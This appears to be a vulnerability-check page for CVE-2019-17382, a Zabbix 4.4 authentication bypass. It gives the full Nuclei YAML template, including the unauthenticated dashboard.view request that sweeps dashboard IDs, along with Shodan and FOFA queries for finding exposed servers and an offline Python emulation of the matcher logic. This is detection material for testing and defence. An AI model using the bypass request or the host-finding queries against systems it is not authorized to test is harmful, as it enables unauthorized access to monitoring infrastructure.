Zabbix <=4.4 - Authentication Bypass
ID: CVE-2019-17382
Severity: critical
Author: harshbothra_
Tags: cve2019,cve,auth-bypass,login,edb,zabbix
Description
Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
YAML Source
id: CVE-2019-17382

info:
  name: Zabbix <=4.4 - Authentication Bypass
  author: harshbothra_
  severity: critical
  description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application.
  remediation: |
    Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47467
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
    - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html
    - https://github.com/huimzjty/vulwiki
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-17382
    cwe-id: CWE-639
    epss-score: 0.3552
    epss-percentile: 0.97136
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 100
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve2019,cve,auth-bypass,login,edb,zabbix

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /
        - /zabbix.php
        - /zabbix/zabbix.php

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(body), "<title>warning [refreshed every", "zabbix-logo", "content=\"zabbix sia")'
        internal: true

  - raw:
      - |
        GET {{path}}?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /zabbix.php
        - /zabbix/zabbix.php
      ids: helpers/wordlists/numbers.txt
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>Dashboard</title>"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008930a2e278a437112ca2edb5b44d774ed69202fe9aaabefa6a98451ff62395b00220671676f8f0cb9821650aca3a1b8a4b3567ad35f01b74cc3ac1dde035781f2f1d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template checks a target for the authentication bypass described above: the first request fingerprints a Zabbix front end, and only then does the second request test whether the dashboard view is served without a session. Run it with the Nuclei tool against the target URL:
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-17382.yaml"
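To make the template's two-request flow and its matcher logic concrete, here is an added, offline re-implementation in Python; it is not part of the Nuclei template or of Zabbix, and it runs only against constructed sample responses (the `DASHBOARD_IDS` tuple stands in for helpers/wordlists/numbers.txt, which is not on this page). It reports whether a host fingerprints as Zabbix and whether any dashboard request came back with HTTP 200 and the Dashboard title, which is exactly the condition the template flags.

```python
from typing import Callable, Dict, Tuple

Response = Tuple[int, str]            # (HTTP status, response body)
Fetcher = Callable[[str], Response]   # maps a request target (path + query) to a response

# http(1): fingerprint strings from the template's contains_any(tolower(body), ...) matcher
FINGERPRINTS = ("<title>warning [refreshed every", "zabbix-logo", 'content="zabbix sia')
FINGERPRINT_PATHS = ("/", "/zabbix.php", "/zabbix/zabbix.php")

# http(2): word + status matchers joined by matchers-condition: and
DASHBOARD_PATHS = ("/zabbix.php", "/zabbix/zabbix.php")
DASHBOARD_IDS = (1, 2, 3)  # assumption: small stand-in for helpers/wordlists/numbers.txt


def is_zabbix_page(body: str) -> bool:
    """First (internal) matcher: any fingerprint string in the lower-cased body."""
    lowered = body.lower()
    return any(marker in lowered for marker in FINGERPRINTS)


def dashboard_served(status: int, body: str) -> bool:
    """Second matcher set: HTTP 200 AND the Dashboard title, i.e. the page rendered without a login."""
    return status == 200 and "<title>Dashboard</title>" in body


def evaluate_flow(fetch: Fetcher) -> Dict[str, object]:
    """Emulate `flow: http(1) && http(2)` with stop-at-first-match on both requests."""
    # http(1): any() stops at the first path whose body fingerprints as Zabbix
    if not any(is_zabbix_page(fetch(path)[1]) for path in FINGERPRINT_PATHS):
        return {"zabbix": False, "vulnerable": False}
    # http(2): clusterbomb over path x ids; return on the first anonymous dashboard hit
    for path in DASHBOARD_PATHS:
        for dashboard_id in DASHBOARD_IDS:
            status, body = fetch(f"{path}?action=dashboard.view&dashboardid={dashboard_id}")
            if dashboard_served(status, body):
                return {"zabbix": True, "vulnerable": True, "path": path, "dashboardid": dashboard_id}
    return {"zabbix": True, "vulnerable": False}


# Constructed sample responses (not captured from a real host)
LOGIN_PAGE = (200, '<html><head><title>Zabbix SIA</title><meta content="Zabbix SIA"></head>'
                   '<body><div class="zabbix-logo"></div>Sign in</body></html>')
DASHBOARD_PAGE = (200, "<html><head><title>Dashboard</title></head><body>Global view</body></html>")


def patched_host(target: str) -> Response:
    # Unauthenticated dashboard.view is bounced to the login page, so the word matcher never fires
    return (302, "") if "action=dashboard.view" in target else LOGIN_PAGE


def unpatched_host(target: str) -> Response:
    return DASHBOARD_PAGE if "action=dashboard.view" in target else LOGIN_PAGE


def not_zabbix(target: str) -> Response:
    return (200, "<html><head><title>Grafana</title></head></html>")
```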